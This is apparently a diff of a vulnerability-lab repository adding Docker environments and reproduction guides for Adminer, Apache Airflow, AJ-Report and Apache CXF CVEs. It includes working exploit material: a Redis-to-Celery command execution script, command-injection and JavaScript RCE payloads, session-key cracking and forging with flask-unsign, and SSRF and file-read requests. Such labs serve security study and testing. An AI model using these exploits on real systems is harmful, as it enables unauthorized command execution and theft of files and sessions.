在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞SSRF
参考连接:
- <https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6>
- <https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf>
- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml>
## 漏洞环境
执行如下命令启动一个安装了Adminer 4.7.8的PHP服务
```
docker compose up -d
```
服务启动后,在`http://your-ip:8080`即可查看到Adminer的登录页面。
## 漏洞复现
在Adminer登录页面选择ElasticSearch作为系统目标并在server字段填写`example.com`,点击登录即可看到`example.com`返回的400错误页面展示在页面中
![](1.png)

6
adminer/CVE-2021-21311/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
web:
image: vulhub/adminer:4.7.8
ports:
- "8080:80"

BIN
adminer/CVE-2021-43008/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 16 KiB

BIN
adminer/CVE-2021-43008/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 93 KiB

32
adminer/CVE-2021-43008/README.md Normal file
View File

@@ -0,0 +1,32 @@
# Adminer Remote Arbitrary File Read (CVE-2021-43008)
[中文版本(Chinese version)](README.zh-cn.md)
Adminer is a tool for managing content in databases developed by PHP. It natively supports MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch and MongoDB.
Improper Access Control in Adminer versions 1.12.0 to 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the remote server by requesting the Adminer to connect to a remote MySQL database.
References:
- <https://github.com/p0dalirius/CVE-2021-43008-AdminerRead>
- <http://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability>
## Vulnerable environment
Execute following command to start a PHP server with Adminer 4.6.2:
```
docker compose up -d
```
After the server is started, you can see the login page of Adminer at `http://your-ip:8080`.
## Exploit
Start a roguo MySQL server through [mysql-fake-server](https://github.com/4ra1n/mysql-fake-server), then paste the `fileread_/etc/passwd` into username field:
![](1.png)
Receive the request and the `/etc/passwd` has been written into current directory:
![](2.png)

30
adminer/CVE-2021-43008/README.zh-cn.md Normal file
View File

@@ -0,0 +1,30 @@
# Adminer远程文件读取CVE-2021-43008
Adminer是一个PHP编写的开源数据库管理工具支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。
在其版本1.12.0到4.6.2之间存在一处因为MySQL LOAD DATA LOCAL导致的文件读取漏洞。
参考链接:
- <https://github.com/p0dalirius/CVE-2021-43008-AdminerRead>
- <http://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability>
## 漏洞环境
执行如下命令启动Web服务其中包含Adminer 4.6.2
```
docker compose up -d
```
服务启动后,在`http://your-ip:8080`即可查看到Adminer的登录页面。
## Exploit
使用[mysql-fake-server](https://github.com/4ra1n/mysql-fake-server)启动一个恶意的MySQL服务器。在Adminer登录页面中填写恶意服务地址和用户名`fileread_/etc/passwd`
![](1.png)
可见,我们已经收到客户端连接,读取到的文件`/etc/passwd`已保存至当前目录:
![](2.png)

6
adminer/CVE-2021-43008/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
web:
image: vulhub/adminer:4.6.2
ports:
- "8080:80"

BIN
airflow/CVE-2020-11978/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 118 KiB

BIN
airflow/CVE-2020-11978/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 18 KiB

BIN
airflow/CVE-2020-11978/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 16 KiB

BIN
airflow/CVE-2020-11978/4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

46
airflow/CVE-2020-11978/README.md Normal file
View File

@@ -0,0 +1,46 @@
# Apache Airflow Command Injection in Example Dag (CVE-2020-11978)
[中文版本(Chinese version)](README.zh-cn.md)
Apache Airflow is an open source, distributed task scheduling framework. In the version prior to 1.10.10, there is a command injection vulnerability in the example DAG `example_trigger_target_dag`, which caused attackers to execute arbitrary commands in the worker process.
Since there are many components to be started, it may be a bit stuck. Please prepare more than 2G of memory for the use of the virtual machine.
References:
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/pberba/CVE-2020-11978>
## Vulnerability Environment
Execute the following commands to start airflow 1.10.10:
```bash
#Initialize the database
docker compose run airflow-init
#Start service
docker compose up -d
```
## Exploit
Visit `http://your-ip:8080` to see the airflow management terminal, and turn on the `example_trigger_target_dag` flag:
![](1.png)
Click the "triger" button on the right, then input the configuration JSON with the crafted payload `{"message":"'\";touch /tmp/airflow_dag_success;#"}`:
![](2.png)
Wait a few seconds to see the execution of "success":
![](3.png)
Go to the CeleryWorker container to see the result, `touch /tmp/airflow_dag_success` has been successfully executed:
```
docker compose exec airflow-worker ls -l /tmp
```
![](4.png)

46
airflow/CVE-2020-11978/README.zh-cn.md Normal file
View File

@@ -0,0 +1,46 @@
# Apache Airflow 示例dag中的命令注入CVE-2020-11978
Apache Airflow是一款开源的分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞未授权的访问者可以通过这个漏洞在Worker中执行任意命令。
由于启动的组件比较多可能会有点卡运行此环境可能需要准备2G以上的内存。
参考链接:
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/pberba/CVE-2020-11978>
## 漏洞环境
依次执行如下命令启动airflow 1.10.10
```bash
#初始化数据库
docker compose run airflow-init
#启动服务
docker compose up -d
```
## 漏洞复现
访问`http://your-ip:8080`进入airflow管理端`example_trigger_target_dag`前面的Off改为On
![](1.png)
再点击执行按钮在Configuration JSON中输入`{"message":"'\";touch /tmp/airflow_dag_success;#"}`,再点`Trigger`执行dag
![](2.png)
等几秒可以看到执行成功:
![](3.png)
到CeleryWorker容器中进行查看
```bash
docker compose exec airflow-worker ls -l /tmp
```
可以看到`touch /tmp/airflow_dag_success`成功被执行:
![](4.png)

90
airflow/CVE-2020-11978/docker-compose.yml Normal file
View File

@@ -0,0 +1,90 @@
version: '3'
x-airflow-common:
&airflow-common
image: vulhub/airflow:1.10.10
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
#AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.default'
user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
depends_on:
redis:
condition: service_healthy
postgres:
condition: service_healthy
services:
postgres:
image: postgres:13-alpine
environment:
POSTGRES_USER: airflow
POSTGRES_PASSWORD: airflow
POSTGRES_DB: airflow
healthcheck:
test: ["CMD", "pg_isready", "-U", "airflow"]
interval: 5s
retries: 5
redis:
image: redis:5-alpine
healthcheck:
test: ["CMD", "redis-cli", "ping"]
interval: 5s
timeout: 30s
retries: 50
airflow-webserver:
<<: *airflow-common
command: webserver
ports:
- 8080:8080
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
interval: 10s
timeout: 10s
retries: 5
airflow-scheduler:
<<: *airflow-common
command: scheduler
healthcheck:
test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
interval: 10s
timeout: 10s
retries: 5
airflow-worker:
<<: *airflow-common
command: worker
healthcheck:
test:
- "CMD-SHELL"
- 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
interval: 10s
timeout: 10s
retries: 5
airflow-init:
<<: *airflow-common
command: initdb
environment:
<<: *airflow-common-env
_AIRFLOW_DB_UPGRADE: 'true'
flower:
<<: *airflow-common
command: flower
ports:
- 5555:5555
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
interval: 10s
timeout: 10s
retries: 5

BIN
airflow/CVE-2020-11981/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 21 KiB

BIN
airflow/CVE-2020-11981/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

53
airflow/CVE-2020-11981/README.md Normal file
View File

@@ -0,0 +1,53 @@
# Apache Airflow Celery Broker Remote Command Execution (CVE-2020-11981)
[中文版本(Chinese version)](README.zh-cn.md)
Apache Airflow is an open source, distributed task scheduling framework. In the version prior to 1.10.10, if the Redis broker (such as Redis or RabbitMQ) has been controlled by attacker, the attacker can execute arbitrary commands in the worker process.
Since there are many components to be started, it may be a bit stuck. Please prepare more than 2G of memory for the use of the virtual machine.
References:
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/apache/airflow/pull/9178>
## Vulnerability Environment
Execute the following commands to start an airflow 1.10.10 server:
```bash
#Initialize the database
docker compose run airflow-init
#Start service
docker compose up -d
```
## Exploit
For exploit this vulnerability, you have to get the write permission of the Celery broker, Redis. In Vulhub environment, Redis port 6379 is exposing on the Internet.
Through the Redis, you can add the evil task `airflow.executors.celery_executor.execute_command` to the queue to execute arbitrary commands.
Use this script [exploit_airflow_celery.py](exploit_airflow_celery.py) to execute the command `touch /tmp/airflow_celery_success`
```
pip install redis
python exploit_airflow_celery.py [your-ip]
```
See the results on the logs:
```bash
docker compose logs airflow-worker
```
![](1.png)
As you can see, `touch /tmp/airflow_celery_success` has been successfully executed:
```
docker compose exec airflow-worker ls -l /tmp
```
![](2.png)

51
airflow/CVE-2020-11981/README.zh-cn.md Normal file
View File

@@ -0,0 +1,51 @@
# Apache Airflow Celery 消息中间件命令执行CVE-2020-11981
Apache Airflow是一款开源的分布式任务调度框架。在其1.10.10版本及以前如果攻击者控制了Celery的消息中间件如Redis/RabbitMQ将可以通过控制消息在Worker进程中执行任意命令。
由于启动的组件比较多可能会有点卡运行此环境可能需要准备2G以上的内存。
参考链接:
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/apache/airflow/pull/9178>
## 漏洞环境
依次执行如下命令启动airflow 1.10.10
```bash
#初始化数据库
docker compose run airflow-init
#启动服务
docker compose up -d
```
## 漏洞利用
利用这个漏洞需要控制消息中间件Vulhub环境中Redis存在未授权访问。通过未授权访问攻击者可以下发自带的任务`airflow.executors.celery_executor.execute_command`来执行任意命令,参数为命令执行中所需要的数组。
我们可以使用[exploit_airflow_celery.py](exploit_airflow_celery.py)这个小脚本来执行命令`touch /tmp/airflow_celery_success`
```bash
pip install redis
python exploit_airflow_celery.py [your-ip]
```
查看结果:
```bash
docker compose logs airflow-worker
```
可以看到如下任务消息:
![](1.png)
```bash
docker compose exec airflow-worker ls -l /tmp
```
可以看到成功创建了文件`airflow_celery_success`
![](2.png)

92
airflow/CVE-2020-11981/docker-compose.yml Normal file
View File

@@ -0,0 +1,92 @@
version: '3'
x-airflow-common:
&airflow-common
image: vulhub/airflow:1.10.10
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
#AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.default'
user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
depends_on:
redis:
condition: service_healthy
postgres:
condition: service_healthy
services:
postgres:
image: postgres:13-alpine
environment:
POSTGRES_USER: airflow
POSTGRES_PASSWORD: airflow
POSTGRES_DB: airflow
healthcheck:
test: ["CMD", "pg_isready", "-U", "airflow"]
interval: 5s
retries: 5
redis:
image: redis:5-alpine
ports:
- 6379:6379
healthcheck:
test: ["CMD", "redis-cli", "ping"]
interval: 5s
timeout: 30s
retries: 50
airflow-webserver:
<<: *airflow-common
command: webserver
ports:
- 8080:8080
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
interval: 10s
timeout: 10s
retries: 5
airflow-scheduler:
<<: *airflow-common
command: scheduler
healthcheck:
test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
interval: 10s
timeout: 10s
retries: 5
airflow-worker:
<<: *airflow-common
command: worker
healthcheck:
test:
- "CMD-SHELL"
- 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
interval: 10s
timeout: 10s
retries: 5
airflow-init:
<<: *airflow-common
command: initdb
environment:
<<: *airflow-common-env
_AIRFLOW_DB_UPGRADE: 'true'
flower:
<<: *airflow-common
command: flower
ports:
- 5555:5555
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
interval: 10s
timeout: 10s
retries: 5

14
airflow/CVE-2020-11981/exploit_airflow_celery.py Normal file
View File

@@ -0,0 +1,14 @@
import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0)
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
task_dict = json.loads(ori_str)
command = ['touch', '/tmp/airflow_celery_success']
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
task_dict['body']=base64.b64encode(json.dumps(body).encode()).decode()
print(task_dict)
r.lpush(queue_name,json.dumps(task_dict))

BIN
airflow/CVE-2020-17526/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 27 KiB

BIN
airflow/CVE-2020-17526/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 20 KiB

BIN
airflow/CVE-2020-17526/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

BIN
airflow/CVE-2020-17526/4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 106 KiB

56
airflow/CVE-2020-17526/README.md Normal file
View File

@@ -0,0 +1,56 @@
# Apache Airflow Authentication Bypass (CVE-2020-17526)
[中文版本(Chinese version)](README.zh-cn.md)
Apache Airflow is an open source, distributed task scheduling framework. Although authentication is not required by default, but the administration can specify the `webserver.authenticate=True` to enable it.
In the version prior to 1.10.13, Apache Airflow uses a default session secert key, which leads to impersonate arbitrary user when authentication is enabled.
References:
- <https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0>
- <https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise>
## Vulnerability Environment
Execute the following commands to start an airflow 1.10.10 server:
```bash
#Initialize the database
docker compose run airflow-init
#Start service
docker compose up -d
```
After the server is started, browse the `http://your-ip:8080` to see the login page of Apache Airflow. Yes, this server required authentication.
## Exploit
Firstly, browse the login page and get a session string from Cookie:
```
curl -v http://localhost:8080/admin/airflow/login
```
![](1.png)
Then, use [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) to crack the session key:
```
flask-unsign -u -c [session from Cookie]
```
![](2.png)
Bingo, we got the valid session key `temporary_key`. Then, use this key to generate a new session whose `user_id` equals to `1`:
```
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
```
![](3.png)
Finally, use this generated session to log in successfully:
![](4.png)

56
airflow/CVE-2020-17526/README.zh-cn.md Normal file
View File

@@ -0,0 +1,56 @@
# Apache Airflow 默认密钥导致的权限绕过CVE-2020-17526
[中文版本(Chinese version)](README.zh-cn.md)
Apache Airflow是一款开源的分布式任务调度框架。默认情况下Apache Airflow无需用户认证但管理员也可以通过指定`webserver.authenticate=True`来开启认证。
在其1.10.13版本及以前,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。
参考链接:
- <https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0>
- <https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise>
## 漏洞环境
执行如下命令启动一个Apache Airflow 1.10.10服务器:
```bash
#Initialize the database
docker compose run airflow-init
#Start service
docker compose up -d
```
服务器启动后,访问`http://your-ip:8080`即可查看到登录页面。
## 漏洞利用
首先我们访问登录页面服务器会返回一个签名后的Cookie
```
curl -v http://localhost:8080/admin/airflow/login
```
![](1.png)
然后,使用[flask-unsign](https://github.com/Paradoxis/Flask-Unsign)这个工具来爆破签名时使用的`SECRET_KEY`
```
flask-unsign -u -c [session from Cookie]
```
![](2.png)
Bingo成功爆破出Key是`temporary_key`。使用这个key生成一个新的session其中伪造`user_id`为1
```
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
```
![](3.png)
在浏览器中使用这个新生成的session可见已成功登录
![](4.png)

92
airflow/CVE-2020-17526/docker-compose.yml Normal file
View File

@@ -0,0 +1,92 @@
version: '3'
x-airflow-common:
&airflow-common
image: vulhub/airflow:1.10.10
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
AIRFLOW__WEBSERVER__AUTHENTICATE: 'true'
AIRFLOW__WEBSERVER__AUTH_BACKEND: 'airflow.contrib.auth.backends.password_auth'
user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
depends_on:
redis:
condition: service_healthy
postgres:
condition: service_healthy
services:
postgres:
image: postgres:13-alpine
environment:
POSTGRES_USER: airflow
POSTGRES_PASSWORD: airflow
POSTGRES_DB: airflow
healthcheck:
test: ["CMD", "pg_isready", "-U", "airflow"]
interval: 5s
retries: 5
redis:
image: redis:5-alpine
healthcheck:
test: ["CMD", "redis-cli", "ping"]
interval: 5s
timeout: 30s
retries: 50
airflow-webserver:
<<: *airflow-common
command: webserver
ports:
- 8080:8080
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
interval: 10s
timeout: 10s
retries: 5
airflow-scheduler:
<<: *airflow-common
command: scheduler
healthcheck:
test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
interval: 10s
timeout: 10s
retries: 5
airflow-worker:
<<: *airflow-common
command: worker
healthcheck:
test:
- "CMD-SHELL"
- 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
interval: 10s
timeout: 10s
retries: 5
airflow-init:
<<: *airflow-common
entrypoint: python /opt/airflow/init-user.py
volumes:
- ./init-user.py:/opt/airflow/init-user.py
environment:
<<: *airflow-common-env
_AIRFLOW_DB_UPGRADE: 'true'
flower:
<<: *airflow-common
command: flower
ports:
- 5555:5555
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
interval: 10s
timeout: 10s
retries: 5

17
airflow/CVE-2020-17526/init-user.py Normal file
View File

@@ -0,0 +1,17 @@
#!/usr/bin/env python
import os
from airflow import models, settings
from airflow.contrib.auth.backends.password_auth import PasswordUser
os.system('/entrypoint initdb')
user = PasswordUser(models.User())
user.username = 'vulhub'
user.email = 'vulhub@example.com'
user.password = 'vulhub'
user.superuser = True
session = settings.Session()
session.add(user)
session.commit()
session.close()
print('initial user finished')

BIN
aj-report/CNVD-2024-15077/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 71 KiB

42
aj-report/CNVD-2024-15077/README.md Normal file
View File

@@ -0,0 +1,42 @@
# AJ-Report Authentication Bypass and Remote Code Execution (CNVD-2024-15077)
[中文版本(Chinese version)](README.zh-cn.md)
AJ-Report is an open source BI platform. In the version 1.4.0 and before, there is a authentication bypass issue and the attacker is able to perform arbitrary code execution through the issue.
References:
- <https://xz.aliyun.com/t/14460>
- <https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md>
## Vulnerable environment
Execute following command to start a AJ-Report server 1.4.0:
```
docker compose up -d
```
After the server is started, you can see the login page of AJ-Report through `http://your-ip:9095`.
## Exploit
To exploit the issue by following request:
```
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: your-ip:9095
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
```
As you can see, `id` command is executed successfully:
![](1.png)

40
aj-report/CNVD-2024-15077/README.zh-cn.md Normal file
View File

@@ -0,0 +1,40 @@
# AJ-Report 认证绕过与远程代码执行漏洞CNVD-2024-15077
AJ-Report是全开源的一个BI平台。在其1.4.0版本及以前,存在一处认证绕过漏洞,攻击者利用该漏洞可以绕过权限校验并执行任意代码。
参考链接:
- <https://xz.aliyun.com/t/14460>
- <https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md>
## 漏洞环境
执行如下命令启动一个AJ-Report 1.4.0服务器:
```
docker compose up -d
```
服务启动后,你可以在`http://your-ip:9095`查看到登录页面。
## 漏洞复现
要利用该漏洞,只需要发送如下数据包:
```
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: your-ip:9095
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
```
可见,`id`命令已经执行成功:
![](1.png)

20
aj-report/CNVD-2024-15077/docker-compose.yml Normal file
View File

@@ -0,0 +1,20 @@
version: '2'
services:
web:
image: vulhub/aj-report:1.4.0
depends_on:
- db
environment:
- MYSQL_HOST=db
- MYSQL_PORT=3306
- MYSQL_DB=aj_report
- MYSQL_USERNAME=root
- MYSQL_PASSWORD=root
ports:
- "9095:9095"
- "5005:5005"
db:
image: mysql:5.7
environment:
- MYSQL_ROOT_PASSWORD=root
- MYSQL_DATABASE=aj_report

BIN
apache-cxf/CVE-2024-28752/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 142 KiB

59
apache-cxf/CVE-2024-28752/README.md Normal file
View File

@@ -0,0 +1,59 @@
# Apache CXF Aegis DataBinding Server-Side Request Forgery (CVE-2024-28752)
[中文版本 (Chinese version)](README.zh-cn.md)
Apache CXF is an open-source services framework that helps you build and develop services using frontend programming
APIs like JAX-WS and JAX-RS.
A SSRF vulnerability using the Aegis DataBinding in versions of Apache CXF before 4.0.4, 3.6.3 and 3.5.8 allows an
attacker to perform SSRF style attacks on webservices that take at least one parameter of any type. This vulnerability
specifically impacts services utilizing the Aegis DataBinding, while services using other data bindings, including the
default, are unaffected. Attackers can exploit this vulnerability to access internal resources by making the server send
requests to arbitrary URLs, potentially leading to information disclosure or further attacks against internal systems.
References:
- <https://github.com/advisories/GHSA-qmgx-j96g-4428>
- <https://nvd.nist.gov/vuln/detail/CVE-2024-28752>
- <https://github.com/ReaJason/CVE-2024-28752>
## Environment Environment
Execute the following command to start a vulnerable Apache CXF webservice with Aegis DataBinding:
```
docker compose up -d
```
After the service starts, the vulnerable CXF webservice will be accessible at `http://your-ip:8080/test?wsdl`. The
service is configured to use Aegis DataBinding and accepts various parameter types, making it vulnerable to SSRF
attacks.
## Vulnerability Reproduction
Send this request to the server:
```
POST /test HTTP/1.1
Host: your-ip:8080
Content-Type: multipart/related; boundary=----kkkkkk123123213
Content-Length: 472
Connection: close
------kkkkkk123123213
Content-Disposition: form-data; name="1"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
<soapenv:Header/>
<soapenv:Body>
<web:test>
<arg0>
<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/hosts"></xop:Include></count>
</arg0>
</web:test>
</soapenv:Body>
</soapenv:Envelope>
------kkkkkk123123213--
```
![1.png](1.png)

54
apache-cxf/CVE-2024-28752/README.zh-cn.md Normal file
View File

@@ -0,0 +1,54 @@
# Apache CXF Aegis DataBinding 服务端请求伪造漏洞 (CVE-2024-28752)
Apache CXF 是一个开源的服务框架,帮助开发者使用 JAX-WS 和 JAX-RS 等前端编程 API 构建和开发服务。
Apache CXF 在 4.0.4、3.6.3 和 3.5.8 版本之前存在一个使用 Aegis
DataBinding 的 SSRF 漏洞,该漏洞允许攻击者对接受至少一个任意类型参数的 Web 服务执行 SSRF 攻击。此漏洞专门影响使用 Aegis
DataBinding 的服务,而使用其他数据绑定 (包括默认数据绑定) 的服务不受影响。攻击者可以利用此漏洞通过让服务器向任意 URL
发送请求来访问内部资源,这可能导致信息泄露或对内部系统的进一步攻击。
参考链接:
- <https://github.com/advisories/GHSA-qmgx-j96g-4428>
- <https://nvd.nist.gov/vuln/detail/CVE-2024-28752>
- <https://github.com/ReaJason/CVE-2024-28752>
## 环境搭建
执行如下命令启动一个存在漏洞的 Apache CXF Web 服务,该服务使用 Aegis DataBinding
```
docker compose up -d
```
服务启动后,存在漏洞的 CXF Web 服务将可以通过 `http://your-ip:8080/test?wsdl` 访问。该服务配置为使用 Aegis
DataBinding 并接受各种参数类型,使其容易受到 SSRF 攻击。
## 漏洞复现
发送如下请求即可触发 SSRF 读取 `/etc/hosts` 文件内容:
```
POST /test HTTP/1.1
Host: your-ip:8080
Content-Type: multipart/related; boundary=----kkkkkk123123213
Content-Length: 472
Connection: close
------kkkkkk123123213
Content-Disposition: form-data; name="1"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
<soapenv:Header/>
<soapenv:Body>
<web:test>
<arg0>
<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/hosts"></xop:Include></count>
</arg0>
</web:test>
</soapenv:Body>
</soapenv:Envelope>
------kkkkkk123123213--
```
![1.png](1.png)

5
